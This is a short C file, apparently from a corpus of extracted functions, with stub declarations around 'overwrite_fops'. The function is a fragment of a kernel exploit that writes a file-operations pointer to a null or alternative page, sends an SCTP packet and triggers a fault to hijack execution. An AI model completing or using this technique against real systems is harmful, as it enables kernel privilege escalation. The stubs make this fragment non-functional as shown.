
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int dummy; } ;
typedef int __u64 ;


 scalar_t__ STRUCT_PAGE_ALT ;
 int fops ;
 int highpage ;
 int sleep (int) ;
 int trigger_fault () ;
 int write_sctp (int,struct sockaddr_in*,int) ;

__attribute__((used)) static void overwrite_fops( int sender,
                            struct sockaddr_in *to_receiver,
                            int receiver)
{
  char *p = ((void*)0);
  if(!highpage)
    p++;
  else
    p = (void*)STRUCT_PAGE_ALT;

  __u64 *uip = (__u64*)p;
  *uip = fops;
  write_sctp(sender, to_receiver, 1);
  sleep(1);
  trigger_fault();
}
